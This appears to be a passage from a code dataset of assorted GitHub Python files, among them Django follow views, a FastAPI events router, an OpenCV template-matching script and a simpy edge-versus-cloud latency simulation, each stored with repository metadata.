data['volume'][k] = data['max_height'] - data['heights_visited'][k]\n self.volume.append(data['volume'][k])\n \n self.data[i].append(data)\n\n\nif __name__ == '__main__':\n HEIGHTS = [1, 3, 2, 4, 1, 3, 1, 4, 5, 2, 2, 1, 4, 2, 2]\n M = Model(HEIGHTS)\n print(json.dumps(asdict(M), indent=2))\n","repo_name":"fjemi/coding_challenges","sub_path":"challenges/lake_volume_01.py","file_name":"lake_volume_01.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36617725805","text":"import numpy as np\nimport time\nfrom graph_tool.all import Graph, shortest_path, load_graph\n\nfrom power_planner.utils.utils import angle, get_lg_donut\nfrom power_planner.utils.utils_constraints import ConstraintUtils\nfrom power_planner.utils.utils_costs import CostUtils\n\nfrom .general_graph import GeneralGraph\n\n\nclass LineGraphFromGraph():\n \"\"\"\n Class to build a line graph from a given weighted graph\n \"\"\"\n\n def __init__(\n self,\n prev_graph,\n cost_instance,\n hard_constraints,\n directed=True,\n graphtool=1,\n verbose=1\n ):\n tic = time.time()\n assert cost_instance.shape == hard_constraints.shape\n self.cost_instance = cost_instance\n self.hard_constraints = hard_constraints\n\n # Load graph\n GeneralGraph.load_graph(self, prev_graph)\n # self.weight_prev = prev_graph.ep.weight\n self.n_edges = len(list(self.g_prev.edges()))\n\n # node to pos mapping\n x_len, y_len = cost_instance.shape\n self.node_pos = [\n (i, j) for i in range(x_len) for j in range(y_len)\n if hard_constraints[i, j]\n ]\n # pos to node mapping\n self.pos2node = np.ones(cost_instance.shape)\n self.pos2node *= -1\n for n, (i, j) in enumerate(self.node_pos):\n self.pos2node[i, j] = n\n print(\"initialized weighted graph (pos2node and node_pos)\")\n\n # edge to node mapping\n max_shape = (\n int(np.max(self.pos2node)) + 1, int(np.max(self.pos2node)) + 1\n )\n self.edge_to_node = 
np.ones(max_shape)\n self.edge_to_node *= -1\n for k, edge in enumerate(self.g_prev.edges()):\n (i, j) = tuple(edge)\n self.edge_to_node[int(i), int(j)] = k\n\n # initilize graph\n GeneralGraph.__init__(\n self, directed=directed, graphtool=graphtool, verbose=verbose\n )\n self.verbose = verbose\n\n self.time_logs = {}\n self.time_logs[\"init_graph\"] = round(time.time() - tic, 3)\n\n def add_nodes(self):\n tic_function = time.time()\n GeneralGraph.add_nodes(self, self.n_edges)\n self.time_logs[\"add_nodes\"] = round(time.time() - tic_function, 3)\n\n def add_edges(self, max_angle=0.5 * np.pi):\n tic_edges = time.time()\n edges = []\n for i, v in enumerate(self.g_prev.vertices()):\n for in_nb in v.in_neighbours():\n for out_nb in v.out_neighbours():\n in_nb_ind = self.node_pos[int(in_nb)]\n out_nb_ind = self.node_pos[int(out_nb)]\n pos = self.node_pos[i]\n # vector between: subtract two pos tuples\n vec1 = np.subtract(in_nb_ind, pos)\n vec2 = np.subtract(pos, out_nb_ind)\n angle_cost = angle(vec1, vec2) / (max_angle)\n if angle_cost <= 1:\n v1_line = self.edge_to_node[int(in_nb), i]\n v2_line = self.edge_to_node[i, int(out_nb)]\n cost_before = self.cost_instance[pos[0], pos[1]]\n edges.append(\n [v1_line, v2_line, 0.5 * angle_cost + cost_before]\n )\n toc_edges = time.time()\n\n tic = time.time()\n self.graph.add_edge_list(edges, eprops=[self.weight])\n\n # time logs\n self.time_logs[\"add_edges\"] = round(time.time() - tic, 3)\n self.time_logs[\"add_edges_times\"] = 0\n self.time_logs[\"edge_list\"] = round(toc_edges - tic_edges, 3)\n self.time_logs[\"edge_list_times\"] = 0\n\n self.time_logs[\"add_all_edges\"] = round(time.time() - tic_edges, 3)\n\n def add_start_and_dest(self, source_pos, dest_pos):\n tic = time.time()\n\n source = self.pos2node[source_pos[0], source_pos[1]]\n dest = self.pos2node[dest_pos[0], dest_pos[1]]\n source_line = self.graph.add_vertex()\n dest_line = self.graph.add_vertex()\n\n source_dest_edges = []\n for e_out in self.g_prev.vertex(source).out_edges():\n e_out = tuple(e_out)\n node_line = self.edge_to_node[int(e_out[0]), int(e_out[1])]\n source_dest_edges.append(\n [self.graph.vertex_index[source_line], node_line, 0]\n )\n\n for e_out in self.g_prev.vertex(dest).in_edges():\n e_out = tuple(e_out)\n node_line = self.edge_to_node[int(e_out[0]), int(e_out[1])]\n source_dest_edges.append(\n [node_line, self.graph.vertex_index[dest_line], 0]\n )\n\n self.graph.add_edge_list(source_dest_edges, eprops=[self.weight])\n\n self.time_logs[\"add_start_end\"] = round(time.time() - tic, 3)\n\n return source_line, dest_line\n\n def get_shortest_path(self, source, dest):\n vertices_path = GeneralGraph.get_shortest_path(self, source, dest)\n path_line = []\n for i, v in enumerate(vertices_path[1:-1]):\n v_ind_line = self.graph.vertex_index[v]\n edge_actual = tuple(list(self.g_prev.edges())[v_ind_line])\n if i == 0:\n path_line.append(\n self.node_pos[self.g_prev.vertex_index[edge_actual[0]]]\n )\n path_line.append(\n self.node_pos[self.g_prev.vertex_index[edge_actual[1]]]\n )\n return path_line, []\n","repo_name":"NinaWie/PowerPlanner","sub_path":"power_planner/graphs/lg_from_graph.py","file_name":"lg_from_graph.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"69863815208","text":"from multirhythm import *\nfrom tools import *\nfrom correlate import coeff_correl\n\nclass VisuMulti :\n\n def __init__ (self, monoTab):\n \"\"\"\n monoTab: a list of (MonoRhythm, MonoMelody) 
elements\n        \"\"\"\n        monoRtab = []\n        self.__nb_tracks = len(monoTab)\n        self.__duration = 0 #tracks max duration\n        for m in monoTab :\n            monoRtab.append(m)\n            if m.get_duration() > self.__duration:\n                self.__duration = m.get_duration()\n        self.__multirhythm = MultiRhythm(monoRtab)\n        self.__rect_built = False\n        self.__rect_rhythm = [[[0 for y in range(self.__nb_tracks)] for x in range(self.__nb_tracks)] for t in range(int(floor(self.__duration * MATRIX_FPS)))]\n\n    def is_visu_ended(self, t):\n        \"\"\"\n        given t the index of __rect_rhythm, \n        return 1 if t >= int(floor(self.__duration * MATRIX_FPS)),\n        i.e if tracks are ended;\n        else return 0\n        \"\"\"\n        return t >= floor(self.__duration * MATRIX_FPS)\n\n    def __compute_interval(self, oframe, frame, length):\n        if frame - CORREL_INTERVAL < 0:\n            a = 0\n        else:\n            a = oframe[frame - CORREL_INTERVAL]\n        if frame + CORREL_INTERVAL < len(oframe):\n            b = oframe[frame + CORREL_INTERVAL]\n        else:\n            b = length\n        return (a, b)\n\n\n    def __coeff_to_color(self, coeff):\n        \"\"\"\n        return a rgb triplet, given a coeff between 0 and 1\n        \"\"\"\n        if coeff < 0.5:\n            r = 250\n            g = int(235 * (coeff * 2)) + 20\n        else:\n            r = int(235 * ((1 - coeff) * 2)) + 20\n            g = 250\n        b = 20\n        return (r, g, b)\n    \n\n    def get_shade_list(self):\n        rect_list = []\n        step = max(1, MATRIX_SIZE // NB_COLORS) #integer step for range(); 1 pixel minimum required\n        size = (MATRIX_SIZE, step)\n        for i in range(0, MATRIX_SIZE, step):\n            pos = (SCREEN_WIDTH - MATRIX_SIZE + i, TRACK_INDENT)\n            surf = pg.Surface(size) \n            color = self.__coeff_to_color(1.0 * i / MATRIX_SIZE)\n            surf.fill(color)\n            rect_list.append((surf, pos))\n        return rect_list\n    \n\n    def get_rect_rhythm(self):\n        \"\"\"\n        size: size of the surface (correlation matrix) to display\n        timer: media player current time\n        \"\"\"\n        if self.__rect_built == False:\n            self.__build_rect_rhythm(coeff_correl)\n            self.__rect_built = True\n        return self.__rect_rhythm\n\n\n    def __build_rect_rhythm(self, correl_coeff):\n        \"\"\"\n        creates a table img[t][x][y] of elements (surf, pos) where\n        surf is the surface to blit and pos the position of the blitting\n        the matrix image list is saved on the self.__rect_rhythm surface\n        for each chosen frame, we display an image composed of (i, j) rectangles\n        with different colours:\n        - black if the track i or j has ended\n        - green if the track i is in time compared to j\n        - red if the track i is out of time compared to j\n        (the colour ranges from green to red depending on the tardiness between i and j)\n        correl_coeff: function computing a correlation coefficient list\n        given two onsets lists and a time frame\n        \"\"\"\n        step = MATRIX_SIZE // self.__nb_tracks #integer pixel step\n        size = (step, step)\n        beat = self.__multirhythm.get_beat()\n        length = floor(self.__duration * MATRIX_FPS)\n        nbframes = int(time_to_frame(length))\n        monolist = self.__multirhythm.get_mono_list() \n        x = 0\n\n        for m1 in monolist: \n            oenv1 = m1.get_onset_envelope() #computed only once\n            sr = m1.get_sample_rate()\n            hl = m1.get_hop_length()\n            y = x\n\n            while y < self.__nb_tracks:\n                #m2 serves as reference to m1 / m2 comparison\n                t = 0 #time index of the rect matrix\n                time = 0 #real time corresponding to t\n                oenv2 = monolist[y].get_onset_envelope()\n                frame = 0 #index of oenv2\n                \n                if x != y:#black squares on the diagonal\n                    while time < length and frame < len(beat):\n                        interval = self.__compute_interval(beat, frame, nbframes)\n                        #third argument must be in frames to compare with beat\n                        time = self.__rect_index_to_time(t)\n                        if m1.get_duration() < time:\n                            #if the compared track is ended, show black squares until the 
end\n                            t = self.__draw_rect_colors(t, x, y, BLACK, length)\n                        else:\n                            coeff = correl_coeff(oenv1, oenv2, interval)\n                            if coeff < CORREL_THRESHOLD:\n                                color = BLACK\n                            else:\n                                color = self.__coeff_to_color(coeff)\n                            t = self.__draw_rect_colors(t, x, y, color, frame_to_time(beat[frame], hl, sr))\n                        frame += 1\n                    #fill the remaining time in black\n                    surf = pg.Surface(size)\n                    surf.fill(BLACK)\n                    while t < floor(self.__duration * MATRIX_FPS):\n                        pos = ((x * step, y * step))\n                        self.__rect_rhythm[t][x][y] = (surf, pos)\n                        pos = ((y * step, x * step))\n                        self.__rect_rhythm[t][y][x] = (surf, pos)\n                        t += 1 \n                y += 1\n            x += 1\n\n    def __rect_index_to_time(self, t):\n        return (t * 1.0) / MATRIX_FPS\n\n    def __draw_rect_colors(self, t, x, y, color, max_time):\n        step = MATRIX_SIZE // self.__nb_tracks #integer pixel step\n        size = (step, step)\n        surf = pg.Surface(size)\n        surf.fill(color)\n        while self.__rect_index_to_time(t) < max_time:\n            #blit the color while the current time (t / MATRIX_FPS) is less than\n            #the time of the current oenv2 frame\n            pos = ((x * step, y * step))\n            self.__rect_rhythm[t][x][y] = (surf, pos)\n            pos = ((y * step, x * step))\n            self.__rect_rhythm[t][y][x] = (surf, pos)\n            t += 1\n        return t \n    \n","repo_name":"Jedyle/music-analysis","sub_path":"src/visumulti.py","file_name":"visumulti.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27687197498","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom bbs.models import Comments, CommentsReply, UserInfo, User, Article, FriendShip\nfrom notifications.models import Notification, NotificationQuerySet\nfrom django.contrib.auth.views import login_required\nfrom django.db import transaction\nimport json\n\n\n@login_required(login_url='/bbs/signup')\ndef get_comment_list(request):\n    if request.method == 'GET':\n        user_info = UserInfo.objects.get(user=request.user)\n        notice_comments = 
Notification.objects.filter(recipient=request.user, verb__in=['评论了你', '回复了你'])\n unread_count_comment = notice_comments.filter(unread=True).count()\n notice_follows = Notification.objects.filter(recipient=request.user, verb='关注了你')\n unread_count_follow = notice_follows.filter(unread=True).count()\n has_followed = FriendShip.objects.filter(following=request.user).values_list(\"followed_id\")\n has_followed = [x[0] for x in has_followed]\n context = {\"notice_follows\": notice_follows, \"user_info\": user_info,\n \"unread_count_follow\": unread_count_follow,\n \"unread_count_comment\": unread_count_comment, \"has_followed\": has_followed}\n return render(request, 'notice/notice_follows.html', context)\n\n\ndef follow_notice_update(request):\n notices = Notification.objects.filter(recipient=request.user, verb='关注了你', unread=True)\n for notice in notices:\n notice.mark_as_read()\n return redirect(\"notice:notice_follow_list\")\n\n\ndef set_following(request):\n following = request.user\n if following.is_anonymous:\n return redirect(\"bbs:signup\")\n else:\n followed_id = request.POST.get('followed_id')\n followed = User.objects.get(id=followed_id)\n like = UserInfo.objects.get(user=following)\n fans = UserInfo.objects.get(user=followed)\n with transaction.atomic():\n FriendShip.objects.create(following=following, followed=followed)\n if like == fans:\n like.like += 1\n like.fans += 1\n like.save()\n else:\n like.like += 1\n like.save()\n fans.fans += 1\n fans.save()\n status = 1\n content = {\n \"status\": status,\n }\n return HttpResponse(json.dumps(content))\n\n\ndef cancel_following(request):\n following = request.user\n if following.is_anonymous:\n return redirect(\"bbs:signup\")\n followed_id = request.POST.get('followed_id')\n followed = User.objects.get(id=followed_id)\n like = UserInfo.objects.get(user=following)\n fans = UserInfo.objects.get(user=followed)\n with transaction.atomic():\n FriendShip.objects.get(following=following, followed=followed).delete()\n if like == fans:\n like.like -= 1\n like.fans -= 1\n like.save()\n else:\n like.like -= 1\n like.save()\n fans.fans -= 1\n fans.save()\n status = 1\n content = {\n \"status\": status\n }\n return HttpResponse(json.dumps(content))","repo_name":"wangle6318/jianshu","sub_path":"notice/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31179635258","text":"from itertools import combinations\r\nfrom collections import deque\r\nfrom copy import deepcopy\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\narr = []\r\nvi = []\r\n\r\nfor i in range(n):\r\n l = list(map(int, input().split()))\r\n arr.append(l)\r\n for j in range(len(l)):\r\n if l[j] == 2:\r\n vi.append([i, j])\r\nresult = float('inf')\r\n\r\ndx = [0, 0, -1, 1]\r\ndy = [-1, 1, 0, 0]\r\n\r\n\r\ndef bfs(vir):\r\n q = deque()\r\n cnt = 0\r\n visit = [[-1 for _ in range(n)]for _ in range(n)]\r\n\r\n for v in vir:\r\n q.append((v[0], v[1]))\r\n visit[v[0]][v[1]] = 0\r\n\r\n while q:\r\n x, y = q.popleft()\r\n\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < n:\r\n if visit[nx][ny] == -1 and arr[nx][ny] != 1:\r\n q.append((nx, ny))\r\n visit[nx][ny] = visit[x][y] + 1\r\n cnt = max(cnt, visit[nx][ny])\r\n\r\n for i in range(len(visit)):\r\n for j in range(len(visit[0])):\r\n if visit[i][j] == -1 and arr[i][j] != 1:\r\n return 10000\r\n return cnt\r\n\r\n\r\nfor 
virus in combinations(vi, m):\r\n result = min(result, bfs(virus))\r\n\r\nif result > 1000:\r\n print(-1)\r\nelse:\r\n print(result)\r\n","repo_name":"junheeLee96/algorithm","sub_path":"백준/Gold/17141. 연구소 2/연구소 2.py","file_name":"연구소 2.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26900781425","text":"import logging\nimport struct\nfrom .constants import STRING_ENCODING\n\nlog = logging.getLogger(__name__)\n\n\nclass MainIndexEntry(object):\n '''A class to read and write main index entries.'''\n\n FORMAT = \"\n''')\n\nprint(\"Opening the file...\")\nfo = open(file_name, 'w')\n\nprint(\"Truncating the file. Goodbye!\")\nfo.truncate()\n\nprint(\"Now I'm going to ask you for three lines.\")\nline1 = input(\"line 1: \")\nline2 = input(\"line 2: \")\nline3 = input(\"line 3: \")\n\nprint(\"I'm going to write these to the file.\")\nfo.write(\nline1 + \"\\n\" + line2 + \"\\n\" + line3 + \"\\n\"\n)\n\nprint(\"And finally, we close it.\")\nfo.close()","repo_name":"MasonTwoK/Python_Hard_way_exercises","sub_path":"ex16/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24193632624","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\nimport os\nimport yaml\nfrom pathlib import Path\n\n\nclass Config:\n\n def __init__(self, **options):\n self.raw = options\n # basic network configuration\n self.base_url = options.get('base_url', 'http://10.0.11.20/iiif')\n\n # paths\n self.source_path = Path(options.get('source_path', '/base/data/iiif/source'))\n self.source_path.mkdir(exist_ok=True)\n self.cache_path = Path(options.get('cache_path', '/base/data/iiif/cache'))\n self.cache_path.mkdir(exist_ok=True)\n\n # info.json settings\n self.min_sizes_size = options.get('min_sizes_size', 200)\n\n # process pool settings\n self.pool_size = options.get('pool_size', os.cpu_count())\n self.pool_recycle_time = options.get('pool_recycle_time', 10)\n\n # image processing settings\n self.processed_cache_size = options.get('processed_cache_size', 1024 * 1024 * 256)\n self.processed_cache_ttl = options.get('processed_cache_ttl', 12 * 60 * 60)\n\n # size definitions for the quick access endpoints\n self.thumbnail_width = options.get('thumbnail_width', 512)\n self.preview_width = options.get('preview_width', 2048)\n\n # original and batch download options\n self.download_chunk_size = options.get('download_chunk_size', 4096)\n self.download_max_files = options.get('download_max_files', 20)\n\n self.default_profile_name = options.get('default_profile', None)\n self.profile_options = options.get('profiles', {})\n\n def has_default_profile(self) -> bool:\n return self.default_profile_name is not None\n\n\ndef load_config() -> Config:\n \"\"\"\n Load the configuration and return it. 
The configuration must be a yaml file and will be loaded\n    from the path specified by the IIIF_CONFIG env var.\n\n    :return: a new Config object\n    \"\"\"\n    env_path = os.environ.get('IIIF_CONFIG')\n    if env_path is None:\n        raise Exception('The config path was not set using env var IIIF_CONFIG')\n\n    config_path = Path(env_path)\n    if not config_path.exists():\n        raise Exception(f'The config path \"{config_path}\" does not exist :(')\n\n    with config_path.open('rb') as cf:\n        return Config(**yaml.safe_load(cf))\n","repo_name":"NaturalHistoryMuseum/iiif-image-server","sub_path":"iiif/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33801712754","text":"from datetime import datetime\nfrom typing import List\nfrom ..db.models.event import Event, EventRead\nfrom .auth import require_current_user, get_current_user\nfrom ..db.models.user import User\nfrom ..db.database import get_session\nfrom fastapi import APIRouter, HTTPException, Depends\nfrom sqlmodel import select, Session\n\nrouter = APIRouter(prefix=\"/event\", tags=[\"event\"])\n\nasync def get_event(id: int, session: Session = Depends(get_session)):\n    event = session.exec(select(Event).where(Event.id == id)).first()\n    if event is None:\n        raise HTTPException(404, \"Event not found\")\n    return event\n\n@router.get(\"/\", response_model=List[EventRead])\nasync def get_events(since:datetime, until:datetime, session:Session=Depends(get_session), user: User = Depends(get_current_user)):\n    events = session.exec(select(Event).where(Event.start_date < until, Event.end_date >= since).order_by(Event.start_date)).all()\n    return [EventRead.from_orm(event, {'is_attended': user in event.users}) for event in events]\n\nid_router = APIRouter(prefix=\"/{id}\")\n\n@id_router.get(\"/\", response_model=EventRead, responses={404: {\"description\": \"Not found\"}})\nasync def read_event(event: Event = Depends(get_event)):\n    return event\n\n@id_router.post(\"/attend\")\nasync def attend_event(event: Event = Depends(get_event), user: User = Depends(require_current_user), session: Session = Depends(get_session)):\n    event.users.append(user)\n    session.add(event)\n    session.commit()\n    return \"ok\"\n\n@id_router.post(\"/stop_attend\")\nasync def stop_attend_event(event: Event = Depends(get_event), user: User = Depends(require_current_user), session: Session = Depends(get_session)):\n    event.users.remove(user)\n    session.add(event)\n    session.commit()\n    return \"ok\"\n\nrouter.include_router(id_router)","repo_name":"ekinohito/caseclub_back","sub_path":"caseclub_back/routes/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40962051708","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image, ImageFont, ImageDraw\nimport os, random, textwrap\n\nclass BomDiaGenerator:\n    def __init__(self, path_img_gerada):\n        self.path_img_gerada = path_img_gerada\n\n        # Load the phrases file\n        with open('./frases.txt', encoding='utf-8') as f:\n            self.frases = f.read().splitlines()\n\n        # Load the greetings file\n        with open('./saudacoes.txt', encoding='utf-8') as f:\n            self.saudacoes = f.read().splitlines()\n        \n        # Load the colors file\n        with open('./cores.txt', encoding='utf-8') as f:\n            self.cores = f.read().splitlines()\n    \n    def get_bom_dia(self, nome_img, extensao):\n        \"\"\" Returns the path of the created image \"\"\"\n        
img = Image.open(self.__get_imagem_random())\n        draw = ImageDraw.Draw(img)\n\n        self.__escrever_texto_na_imagem(draw, self.__get_frase_random(), 30, 40, 25, False)\n        \n        self.__escrever_texto_na_imagem(draw, self.__get_saudacao_random(), 460, 50, 20, True)\n\n        img.save('{}/{}.{}'.format(self.path_img_gerada, nome_img, extensao))\n    \n    def __escrever_texto_na_imagem(self, draw, frase, pos_y, tam_fonte=40, tam_linha=25, texto_colorido=False):\n        fnt = ImageFont.truetype(self.__get_font_random(), tam_fonte)\n        borda = 2\n        \n        cor_texto = (255, 255, 255)\n        if texto_colorido:\n            cor_texto = self.__get_cor_random()\n\n        lines = textwrap.wrap(frase, width=tam_linha)\n        y_text = pos_y\n        for line in lines:\n            width, height = fnt.getsize(line)\n            draw.text((((600 - width) / 2) - borda, y_text - borda), line,(0,0,0),font=fnt)\n            draw.text((((600 - width) / 2) + borda, y_text - borda), line,(0,0,0),font=fnt)\n            draw.text((((600 - width) / 2) + borda, y_text + borda), line,(0,0,0),font=fnt)\n            draw.text((((600 - width) / 2) - borda, y_text + borda), line,(0,0,0),font=fnt)\n\n            \n            \n            draw.text(((600 - width) / 2, y_text), line, font=fnt, fill=cor_texto)\n            y_text += height\n\n    def __get_cor_random(self):\n        rand = self.cores[random.randint(0, len(self.cores) - 1)]\n        return tuple(map(int, rand.split(\",\")))\n\n    def __get_imagem_random(self):\n        return 'imgs/' + random.choice(os.listdir('imgs/')) \n\n    def __get_font_random(self):\n        return 'fonts/' + random.choice(os.listdir('fonts/')) \n\n    def __get_frase_random(self):\n        return self.frases[random.randint(0, len(self.frases) - 1)]\n    \n    def __get_saudacao_random(self):\n        return self.saudacoes[random.randint(0, len(self.saudacoes) - 1)]","repo_name":"Kushima/bomdia-tia","sub_path":"bomdia_tia.py","file_name":"bomdia_tia.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2057039006","text":"# MultiTemplateSearch 11/12/17\n\n# Will return the locations of multiple template matches in an image\n\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pyautogui\nimport time\n\nimg_rgb = cv2.imread('Cakes.png')# The path for the image you are searching goes here.\nimg_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)# Convert the color of the image\ntemplate = cv2.imread('cake2.png',0)# The path for your template (The image you are searching for) goes here\nw, h = template.shape[::-1]\n\nres = cv2.matchTemplate(img_gray,template,cv2.TM_CCOEFF_NORMED)# Run the matchTemplate cv2 function\nthreshold = .95 # Higher is more accurate, and will yield fewer positives\nloc = np.where( res >= threshold)\n\ncount = 0\nx = []\ny = []\n\nfor pt in zip(*loc[::-1]): # Find all the matches and organize them into two lists with coordinates\n    cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0,0,255), 2) # Draw rectangles on matches\n\n    count = count + 1\n    x.append(pt[0] + w/2)\n    y.append(pt[1] + h/2)\n\n\n# Resize the image\nscale = 2\n(newx, newy) = img_rgb.shape[1] / scale, img_rgb.shape[0] / scale # new size (w,h)\nscaled = cv2.resize(img_rgb, (int(newx), int(newy)))\n\n# Display results\ncv2.imshow(\"Scaled\", scaled)#scaled image\ncv2.imshow(\"Image Matches\", scaled)#original image\n\nprint(\"Count = {}\".format(count))#How many matches found\n\n#Print out locations\ncounts = 0\nwhile counts <= count-1:\n    print(\"X = \" + str(x[counts]) + \" Y = \" + str(y[counts]))\n    pyautogui.moveTo(int(x[counts] / 2), int(y[counts] / 2))\n    counts += 1\n\nprint(\"{} cakes 
found.\".format(count))\n\n\ncv2.waitKey(0) # wait for an esc keypress\ncv2.destroyAllWindows()\n","repo_name":"pizzafoot/TemplateMatching","sub_path":"MultiTemplateSearch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728476820","text":"#!/usr/bin/env python3\n#\n#euler323 / Bitwise-OR operations on random integers\nimport time\n\n# Debut du decompte du temps\nstart_time = time.time()\n\n# main\nE = 0 #expectation\nprevious_prob = 0 #probability of previous N\nfor i in range(1, 100):\n E+=i*(((2**i-1)/(2**i))**32-previous_prob)\n previous_prob = ((2**i-1)/(2**i))**32\n if i%10==0:\n print(E) #converges to the answer\n\n# Affichage du temps d execution\nprint(\"Temps d execution : %s secondes ---\" % (time.time() - start_time))","repo_name":"allagonne/Euler_project","sub_path":"euler323.py","file_name":"euler323.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74172608809","text":"import multiprocessing\nimport random\nfrom typing import Dict\n\nimport simpy\nfrom matplotlib import pyplot as plt\n\nfrom result_container import ResultContainer\nfrom src import default_architecture_parameters\nfrom src.clients.data_reader_client import DataReaderClient\nfrom src.processing_units.processing_location_central import ProcessingLocationCentral\nfrom src.processing_units.processing_location_district import ProcessingLocationDistrict\nfrom src.processing_units.on_processing_ended_enum import OnProcessingEndedEnum\n\nTOTAL_PACKAGES_READ_BY_EACH_CLIENT = 2 # Note: each client has a waiting time before reading a new data.\nCLIENTS_DISTRICTS_RATIO_RANGE = [2, 125, 250, 375, 500, 625, 750, 875, 1000, 1125, 1250, 1375, 1500, 1625]\nprint(list(CLIENTS_DISTRICTS_RATIO_RANGE))\n\nCONFIGURATIONS_EDGE = [{\"ratio\": i, \"type\": \"edge\"} for i in CLIENTS_DISTRICTS_RATIO_RANGE]\nCONFIGURATIONS_CLOUD = [{\"ratio\": i, \"type\": \"cloud\"} for i in CLIENTS_DISTRICTS_RATIO_RANGE]\n\n\ndef run_configuration(config: Dict) -> ResultContainer:\n ratio = config['ratio']\n number_of_clients = default_architecture_parameters.NUMBER_OF_DISTRICTS * ratio\n print(f\"################## Running configuration: {ratio}\")\n\n # Setup the simulation.\n result_container = ResultContainer(simulation_name=str(ratio), simulation_type=config['type'])\n env = simpy.Environment()\n\n edge_locations = []\n if config[\"type\"] == \"edge\":\n for i in range(default_architecture_parameters.NUMBER_OF_DISTRICTS):\n edge_district = ProcessingLocationDistrict(\n simpy_env=env,\n result_container=result_container,\n name=f'Location{i}',\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_DISTRICT,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_DISTRICT,\n on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY,\n )\n edge_district.start_listening_for_incoming_data()\n edge_locations.append(edge_district)\n elif config[\"type\"] == \"cloud\": # If cloud, setup the cloud and data_producers\n cloud = ProcessingLocationCentral(\n simpy_env=env,\n result_container=result_container,\n name=\"Cloud\",\n is_data_coming_from_first_link=True,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_CENTRAL,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_CENTRAL,\n 
on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY,\n )\n cloud.start_listening_for_incoming_data()\n edge_locations.append(cloud)\n else:\n raise Exception('Type not recognized')\n\n for i in range(number_of_clients):\n data_reader = DataReaderClient(\n simpy_env=env,\n result_container=result_container,\n name=f'DataProducerClient{i}',\n use_single_transmission=True,\n transmission=random.choice(edge_locations).get_incoming_transmission(),\n number_of_packages_to_read=TOTAL_PACKAGES_READ_BY_EACH_CLIENT,\n )\n data_reader.start_reading_data()\n\n # Run simulation.\n env.run()\n\n result_container.print_result()\n return result_container\n\n\npool = multiprocessing.Pool(processes=4) # Fewer processes to avoid using too much RAM.\nresults_edge = pool.map(run_configuration, CONFIGURATIONS_EDGE)\n\npool = multiprocessing.Pool(processes=4) # Fewer processes to avoid using too much RAM.\nresults_cloud = pool.map(run_configuration, CONFIGURATIONS_CLOUD)\n\n# Prepare plot variables\ntotal_latencies_edge = [result.get_average_total_latency() for result in results_edge]\ntotal_latencies_cloud = [result.get_average_total_latency() for result in results_cloud]\ntotal_distance_edge = [result.get_average_first_link_distance() + result.get_average_second_link_distance() for result in results_edge]\ntotal_distance_cloud = [result.get_average_first_link_distance() + result.get_average_second_link_distance() for result in results_cloud]\nx_positions = [default_architecture_parameters.NUMBER_OF_DISTRICTS * i for i in CLIENTS_DISTRICTS_RATIO_RANGE]\n\n# Plot total latency.\nplt.figure(figsize=(8, 6))\nplt.title('Read Latencies')\nplt.plot(x_positions, total_latencies_edge, color=\"green\")\nplt.plot(x_positions, total_latencies_cloud, color=\"red\")\nplt.axes().yaxis.grid() # horizontal lines\nplt.axes().set_xlim([0, None])\nplt.axes().set_ylim([0, None])\nplt.xlabel(\"Number of clients\")\nplt.ylabel(\"Average Read Latency\")\nplt.legend([\"Edge solution\", \"Cloud solution\"])\nplt.tight_layout()\nplt.show()\n\n# Plot total distance.\nplt.figure(figsize=(8, 6))\nplt.title('Read Distances')\nplt.plot(x_positions, total_distance_edge, color=\"green\")\nplt.plot(x_positions, total_distance_cloud, color=\"red\")\nplt.axes().yaxis.grid() # horizontal lines\nplt.axes().set_xlim([0, None])\nplt.axes().set_ylim([0, None])\nplt.xlabel(\"Number of clients\")\nplt.ylabel(\"Average Read Distance\")\nplt.legend([\"Edge solution\", \"Cloud 